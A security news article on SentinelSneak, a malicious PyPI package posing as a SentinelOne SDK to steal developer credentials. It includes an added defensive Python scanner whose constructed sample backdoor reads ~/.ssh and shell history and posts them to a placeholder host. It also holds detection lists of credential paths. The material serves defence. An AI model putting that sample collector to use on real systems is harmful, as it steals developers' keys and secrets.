Malicious PyPI Module Poses as SentinelOne SDK

Security researchers with ReversingLabs warn of a new supply chain attack using a malicious PyPI module that poses as a software development kit (SDK) from the cybersecurity firm SentinelOne.

The Python package was first uploaded on December 11 and received roughly 20 updates within the next two days. The module is completely unrelated to the legitimate threat detection firm, but abuses its brand reputation to attract unsuspecting victims.

The package appears to be a fully functional SentinelOne client, seemingly built on top of legitimate SentinelOne code, but it also carries backdoor code intended for data theft.

“This PyPI package is intended to serve as an SDK to abstract the access to SentinelOne’s APIs and make programmatic consumption of the APIs simpler,” ReversingLabs, which calls the attack ‘SentinelSneak’, notes.

The malicious package contains two api.py files that engage in suspicious behavior such as enumerating the files in a directory, executing a file, deleting files or directories, and spawning new processes.

An analysis of the updates that the package received over the course of two days showed that only api.py files were modified. These are the only package modules to contain the malicious code.

The backdoor was designed to exfiltrate data specific to development environments: shell command execution history, the contents of the SSH folder (which holds SSH keys and configuration), and configuration files that hold credentials for Git, Kubernetes, and AWS services.

The malware also lists folders in the root directory and sends all collected data to the command-and-control (C&C) server.
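The behaviours described in the preceding paragraphs (listing directories, spawning processes, reading shell history and the SSH folder, and sending the result to a server) are exactly the combination a reviewer can look for before installing a package. The script below is an added example, not ReversingLabs' tooling and not code from the malicious module: it statically scans every .py file in a package directory for those indicators using Python's ast module. The sample package it builds is constructed inline for the demonstration, the hostname example.invalid is a placeholder, and the indicator lists are assumptions modelled on the article, not a complete detection rule set.

```python
"""Static triage of a downloaded Python package for backdoor indicators.

Added example: walks a package tree, parses each .py file with `ast`, and
records (a) imports of network modules, (b) calls that execute or spawn
processes, (c) calls that list or delete files, and (d) string literals
naming developer-credential locations.  Nothing in the scanned package is
ever executed.  The sample package is constructed here and is inert.
"""
import ast
import os
import tempfile
import textwrap
from typing import Dict, List

# Assumed indicators, modelled on the article's description of SentinelSneak.
SENSITIVE_PATH_MARKERS = (".ssh", ".bash_history", ".zsh_history",
                          ".gitconfig", ".kube", ".aws")
EXEC_CALLS = {"os.system", "os.popen", "os.execv", "subprocess.Popen",
              "subprocess.run", "subprocess.call", "subprocess.check_output"}
FS_CALLS = {"os.listdir", "os.scandir", "os.walk", "os.remove",
            "os.unlink", "shutil.rmtree"}
NET_MODULES = {"socket", "requests", "urllib", "http", "httpx"}


def _dotted_name(node: ast.AST) -> str:
    """Return 'a.b.c' for a Name/Attribute chain, or '' if it is not one."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return ""


def scan_source(source: str) -> List[str]:
    """Return the sorted, de-duplicated indicators found in one source file."""
    findings: List[str] = []
    try:
        tree = ast.parse(source)
    except SyntaxError:
        return ["unparseable-source"]
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for alias in node.names:
                if alias.name.split(".")[0] in NET_MODULES:
                    findings.append(f"network-import:{alias.name}")
        elif isinstance(node, ast.ImportFrom):
            if (node.module or "").split(".")[0] in NET_MODULES:
                findings.append(f"network-import:{node.module}")
        elif isinstance(node, ast.Call):
            name = _dotted_name(node.func)
            if name in EXEC_CALLS:
                findings.append(f"exec:{name}")
            elif name in FS_CALLS:
                findings.append(f"filesystem:{name}")
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            for marker in SENSITIVE_PATH_MARKERS:
                if marker in node.value:
                    findings.append(f"sensitive-path:{marker}")
    return sorted(set(findings))


def scan_package_dir(root: str) -> Dict[str, List[str]]:
    """Map each .py file (relative path, '/' separators) to its non-empty findings."""
    report: Dict[str, List[str]] = {}
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if not fn.endswith(".py"):
                continue
            full = os.path.join(dirpath, fn)
            with open(full, encoding="utf-8", errors="replace") as fh:
                hits = scan_source(fh.read())
            if hits:
                report[os.path.relpath(full, root).replace(os.sep, "/")] = hits
    return report


def is_suspicious(findings: List[str]) -> bool:
    """Credential-path access combined with exec or network capability is the
    pattern the article attributes to the backdoored api.py."""
    kinds = {f.split(":", 1)[0] for f in findings}
    return "sensitive-path" in kinds and bool(kinds & {"exec", "network-import"})


def build_sample_package(root: str) -> None:
    """Write a constructed two-file package: a benign client and a bad api.py."""
    os.makedirs(os.path.join(root, "sdk"), exist_ok=True)
    benign = textwrap.dedent('''
        import json
        class Client:
            def __init__(self, base_url, token):
                self.base_url = base_url
                self.token = token
            def headers(self):
                return {"Authorization": "ApiToken " + self.token}
    ''')
    # Constructed stand-in for the reported behaviour; never executed here.
    backdoor = textwrap.dedent('''
        import os, subprocess, requests
        def collect():
            home = os.path.expanduser("~")
            data = {"ssh": os.listdir(os.path.join(home, ".ssh"))}
            data["history"] = open(os.path.join(home, ".bash_history")).read()
            data["root"] = os.listdir("/")
            data["uname"] = subprocess.check_output(["uname", "-a"])
            requests.post("http://example.invalid/upload", json=data)
    ''')
    with open(os.path.join(root, "sdk", "client.py"), "w") as fh:
        fh.write(benign)
    with open(os.path.join(root, "sdk", "api.py"), "w") as fh:
        fh.write(backdoor)


def run_demo() -> Dict[str, object]:
    """Build the sample package in a temp dir, scan it, and return the verdicts."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_package(tmp)
        report = scan_package_dir(tmp)
    suspicious = sorted(p for p, hits in report.items() if is_suspicious(hits))
    return {"report": report, "suspicious": suspicious}


if __name__ == "__main__":
    for path, hits in run_demo()["report"].items():
        print(path, "SUSPICIOUS" if is_suspicious(hits) else "ok", hits)
```

Run it against an unpacked sdist or wheel (`pip download --no-deps <pkg>` then extract) before installing; a file that both names ~/.ssh or shell history and imports a network client or spawns processes deserves a manual read, regardless of how legitimate the rest of the package looks.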

The changes across the package's successive updates suggest the attackers were adapting to their targets, tuning the backdoor to work better across multiple operating systems.

ReversingLabs says it observed five additional packages with similar naming variations, but those did not contain api.py files with malicious functionality. These packages were seen prior to December 11 and were likely meant for testing purposes.

“The malicious code appears designed to siphon sensitive information from development environments. Based on our analysis of the malware and the associated C&C infrastructure, it is unclear if this package was or is being used in active attacks against development environments, due to a lack of evidence found. The download stats suggest that the package has been downloaded more than 1,000 times,” ReversingLabs warns.

Written By

Ionut Arghire is an international correspondent for SecurityWeek.
